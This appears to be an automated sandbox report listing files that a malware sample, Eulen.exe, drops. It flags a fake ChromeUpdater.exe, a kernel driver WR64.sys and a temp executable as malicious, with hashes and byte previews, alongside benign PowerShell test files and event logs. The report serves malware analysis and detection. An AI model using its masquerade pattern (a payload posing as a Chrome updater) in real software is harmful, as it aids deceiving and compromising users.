C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe

Download File

Process:	C:\Users\user\Desktop\Eulen.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	44977152
Entropy (8bit):	7.944524618338768
Encrypted:	false
SSDEEP:	786432:0k1E58Eufbqc0mWvEjgYsvdT/sG8r+KMbDna+ioiYL:07O7DqJ5EjgYu38yfbDHL
MD5:	F8DD965FE02F49C93F22972470D480B3
SHA1:	859B8399768955C861037B246CA458E847041622
SHA-256:	ACBAE9FB2FE0B90EB94C09BC11726A544FFD22FB5ED20F4477227979E88FDC7D
SHA-512:	C1CDA92F3F83B50CCF8917920081F89675735EDDF2020E1AD3B7429A46268C8893DB7B27C80DAA673F29FFD4B2523220D3852D1C76883AE1E7E35645B11588F4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....A-g...............&........&...Bp........@.............................P............`... .............................................P...d....@......p...L;...........0..............................0MB.(.....................?.h............................text...............................`..`.data...@...........................@....rdata...>...p......................@..@.pdata..<...........................@..@.xdata..L..........................@..@.bss.....%...............................idata..4...........................@....CRT....`.... ......................@....tls.........0......................@....@yC.........@......................@..@.j]_.........P...................... ..`.+.:....(.....?.....................@....D6u.....6....?..8..................`..h.reloc.......0.......F..............@..@.rsrc........@.......H..............@..@........

C:\Program Files\Google\Libs\WR64.sys

Download File

Process:	C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: U9jAFGWgPG.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: ICBM.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: ICBM.exe, Detection: malicious, Browse Filename: ICBM.exe, Detection: malicious, Browse Filename: ahlntQUj2t.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0ojllcn.cgo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfbhru4r.nsc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqciau5l.qg3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjmckk3c.srm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1wu2e0t.tme.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqwxrnmy.eeh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qifnalp1.m0n.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yoqn2kzl.xrt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp

Download File

Process:	C:\Users\user\Desktop\Eulen.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	150528
Entropy (8bit):	5.769203996328619
Encrypted:	false
SSDEEP:	3072:60gp4UGo8MYmB99SrtM0ieiG027bAM8mMu0cM:60c4kzOieR02s
MD5:	658AC2968AC81EADBE165CFD2A770C34
SHA1:	39D228C2B5D1181ABE8BCE6A95FE852C8E06A79C
SHA-256:	4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
SHA-512:	CAF647E30FB73FE25E879A83C38D24B9E2453754DABBB3B2C7E885B814C9C06053206CBAAE777061C3873FC687DE5F15FAC5058B8B675C57235CFCCC2277A106
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$............qgL.qgL.qgL..aM.qgL..fM.qgL.qfL.qgLO.oM.qgLO..L.qgLO.eM.qgLRich.qgL........................PE..d.....[c.........."...... ...*.......#.........@..........................................`..................................................8.......p..`....`..8....................5..8............................................0...............................text...%........ .................. ..`.rdata.......0.......$..............@..@.data........P......................@....pdata..8....`.......8..............@..@.rsrc...`....p.......:..............@..@........................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	71304
Entropy (8bit):	4.196749446565022
Encrypted:	false
SSDEEP:	768:cLwVaj/31jjHCOAskHicRbHoP5rAKP5feZ7IHoDsMMcAa57Mi:TVaj/31dtkCcdIPuKPBU5
MD5:	C921C51D8E7CA6B84DE459DF888F4581
SHA1:	243AA3DA1B17C1F6AC34D0E0E4B5C983F4766604
SHA-256:	15952A0C30DA6549989BECF277418306B1952F5ECF98A334DF48CA9039D53685
SHA-512:	90EBEB188DA6FFCB6957311CC0E5F9CD310ACA3104116F5C0EB5D90AA42FA494C164B37C484DFEAB5F5C847F1318A31C2E6BE86B010B6816F1AA1CE6DE417CDF
Malicious:	false
Preview:	ElfChnk.................[.......[...............X......u.....................................................................`.x............................................=...........................................................................................................................g...............@...........................n...................M...]...........................j.......................................................................&...............................................**..X...[.......i....1.........3d.&........3d....P..k..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 310, DIRTY
Category:	dropped
Size (bytes):	112680
Entropy (8bit):	3.741604264266249
Encrypted:	false
SSDEEP:	768:CVUHiapX7xadptrDT9W84H6eGVUHiapX7xadptrDT9W84H6e:9Hi6xadptrX9WPaYHi6xadptrX9WPa
MD5:	198263EA019BEC457C20CAF4F9008DEE
SHA1:	A6BC46AABAFAC53C8DD00929AD71461CAAA1D2C2
SHA-256:	BB9556A9F5A534B92A9C92B2FF8A5D9BDD393E5CAB8001E1A0480CA24482764B
SHA-512:	247F31EFE83E96755AC5FDDC5ED8A43A4EC804BF3CDFAC0511FE26262B89B29CCC1055AC38B1610B471DEC0A43B2BF12DE624C34BAD263C3BA8D17C37D57C3C7
Malicious:	false
Preview:	ElfFile.................6....................................................................................................I].ElfChnk.........7...............7.....................n4........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.377721629524822
Encrypted:	false
SSDEEP:	384:fhZN/GN6N/NDsNadNDtNkN6NQNQxNhdNQaNwNwNONPNavNqN6NfNjNALNCNyN7Ns:fZeIPRThtUmqYXL3QXr0Q7
MD5:	B59AFB7FCA4C7067FBB3EF413064809B
SHA1:	785A500AA8ADA1D59F3F7FD48E876F2305E7072D
SHA-256:	ED35583D239B8BBF565E20C872268401F9D05A4DCCE4ABA7F83BA99A5978FD95
SHA-512:	C86B8AE075AA4E669D9DE8EDC1C3E430D68F1A155153EE7B4C7B1898E03E42334C37FFAE7CD35B759EB019822762C7048083BEA711439FAA1D869360CE59CD88
Malicious:	false
Preview:	ElfChnk.{...............{..........................[.x......................................................................D.\........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................=c......................=j...........................?......]...............................................-g..................**......{.......n=.df..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66960
Entropy (8bit):	4.269665477857987
Encrypted:	false
SSDEEP:	384:8VdVghMVnRVSV3V9VbVSV5VjVMV/V1VQVPTV0V6V6VoVbVaVVVlVlVmVTVwVgVA2:1+HNi20Hl6Mun
MD5:	165324C5DB437EC0B366A38426A7D965
SHA1:	B3F993BA434DF8FEFE4305DD879DD176346AA497
SHA-256:	01217A22139EAA95419CE4A625323B8297778CC88FAD32CEAB291E2CC99D3F6B
SHA-512:	AA45125B23D6B882113100EA37621E6341AA098BE825BD40F3EA589106C08F4B7104E2073F0DEF60D668B1D31001627AC0AB836CD88486A3AA97B58B931D975D
Malicious:	false
Preview:	ElfChnk.....................................8_...a...s.]....................................................................iBN;................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................9@...............................=.........................1.........Z..&...............................................................@.......X...a.!.....E..........@.....1..0.U.f....tU.f................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y......&........................1.........Z

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.19016220183431
Encrypted:	false
SSDEEP:	384:hhsmsmi7mRXZmVkWmhTimmdmBmKmPhmRTmimZ8mevmcsm7mrmQmzmjmvmTmmYmeq:h2klTiGFKX93WGUGTeOg26
MD5:	526118A057F25B4093FCD2E9BB4BAE2A
SHA1:	6140AFC2504BD3CB05691A2E08001CAEE04BD19B
SHA-256:	D54964E05972824D3FF5D614117D00B1321848D7F2C2FC32C247DD9D2F53DCD0
SHA-512:	009756CFC34608B7C518A23A6A9471010AB31955F3C3E85863738C1C65D66D59791AABBB784A8EED2A7415572AC6A753C8586910E52419FE2372D0A5E4A9BC01
Malicious:	false
Preview:	ElfChnk.@-......o-......@-......o-..........(..............................................................................].$b................\...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................5...c#..{1..k:...................v..........**..x...@-......U.hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.4560801524560589
Encrypted:	false
SSDEEP:	96:lNVaO8sMa3Z85ZMLkm3Z85ZP3Z85ZAz4rjjD3Z85Zu:vV7pp8nMLkmp8nPp8nWMvDp8n
MD5:	45849CC1E720400103CEDF84A41DC123
SHA1:	A841E1C9F7F6C3CF5C15C39F94FD0424CF126B68
SHA-256:	CEA40288D06C6FC947BBEA061C3F48B685C20FE855976DDF0447C7BA8B98C110
SHA-512:	B906179BE96C074558FD7BF66A03A1FF8EC402E865A6FE979AAB387AFAB3A93C5EF81EE65303279C2307AD5F7BB9656D94B99328E5FF8D459195D819BC3B66FA
Malicious:	false
Preview:	ElfChnk.....................................@.......SV.....................................................................................................................=...........................................................................................................................f...............?...................................p...........M...F...............................................f...................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.467947111655398
Encrypted:	false
SSDEEP:	1536:xZPZn2bBN2A4VD7VAx8whAGU2woJQghwMvOUFwe8OQhNwRA:
MD5:	6B473E7917B1EDEE80CAFE7D24A6A4E8
SHA1:	1940F41550F2986C928648ED00F9C6E4868D1A23
SHA-256:	1D52F13D2EA4ACC472815240DBFF0F34C6CD5E86F980D04D9AD28E42C3E7A355
SHA-512:	9AABAD5B7425A9692545864C11B99DDED0051CE8B442FFAB7BAB21DD8CD68B51BC980B01F324A81C685DC56793581AE2E6751DD08497CCBA64FB3339A9B5483D
Malicious:	false
Preview:	ElfChnk.e.......h.......e.......h...............x....;.......................................................................Z}............................................=...............y...........................................................................................................L...............?...............................................M...F...............................................&...................................................................................n...............**......e..........f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.565838744973026
Encrypted:	false
SSDEEP:	1536:PXY5nVYIyyqED5BVZUe39vHxt1BSocM1:PXY5nVYIyyqED5BVZUe39vHxt1BSot
MD5:	B30C931B9EF047307E1443502CE7EE14
SHA1:	BAC3632B709B853DFFCD9C4D65D1F9236F6FE551
SHA-256:	033CF49641F4E76EFABF8F25753074E7EE72DD567FBA4145D446032D3D9CFADB
SHA-512:	F5A9CA2D464EBA1F2F4EA426AC3864FB399A8951958BA44BA550E2129C4F4D4DA9E60F0D1B18A07CC76D4BC2CFD20D283F446A47DF990B52916113D5383A1952
Malicious:	false
Preview:	ElfChnk.........~...............~...................F..........................................................................T................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................N...............y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	91344
Entropy (8bit):	2.48285310550021
Encrypted:	false
SSDEEP:	384:mhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorXorWorxFo8ormor8orO:mDCFZMDCFZL
MD5:	5F69BD14F0F06EE8B6C40A5CCE43A4FE
SHA1:	CC8A3C0E36105EA50EFEE3C338F8B95442D8D683
SHA-256:	C6B5158884AF0386FEE99340E9E8B9D84484374701DF86F7A6B7D840E9F6CA78
SHA-512:	FB1C10A13B4408D99706D9576A22F7BA5407E60A1E88F5E58A43CB8653CECED2FE72FC2B26035551170D705FAE200963F0724588FF0A52E5E998DC1E84B2502B
Malicious:	false
Preview:	ElfChnk.....................................`J...L..............................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/....... ......U)..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8511209646626153
Encrypted:	false
SSDEEP:	384:ChAiPA5PNPxPEPHPhPEPmPSPRP3PoPbPfP0bPnPdP:C2NZ
MD5:	A98C811B8E1B821CD1FE05A68ADD446A
SHA1:	4E8B739F5E308F943962E72FF24212FFBE47FAD7
SHA-256:	58F6584C100174B80ACB8940226841B77884326A293CEE9072F4DD4CF8C10133
SHA-512:	24A7B9C86A6CE93B9B7F4107A433A247789EE568EB69E301B51DC9D01AA40D2F408AD76B78F7F83E5F4EB47C1677276BC86F86A99BAB95186C2331ABE4CA523C
Malicious:	false
Preview:	ElfChnk......................................%...&..?........................................................................<.m................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................ ..............'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8431535491551847
Encrypted:	false
SSDEEP:	384:OhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:OWXSYieD+tvgzmMvRQAsNi
MD5:	106F006ACA6287586EF71A10A5C06C4D
SHA1:	B4B6D91FF53E9BDFC8D0D99A0D6F643E49074932
SHA-256:	79E64A943AED80ADAE43934E4573F95AE7308DDD6FC896EEDDB386C8A41FBA65
SHA-512:	F4D49C8CBC2B46719521935DFABDC3E05883C2360D4E472920C420B1ACC74D0F835D10A2C5BA6E29038425809D585025172FDC9E534619C017D70FA4D9F23D53
Malicious:	false
Preview:	ElfChnk......................................$...&..{n.8.....................................................................{..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

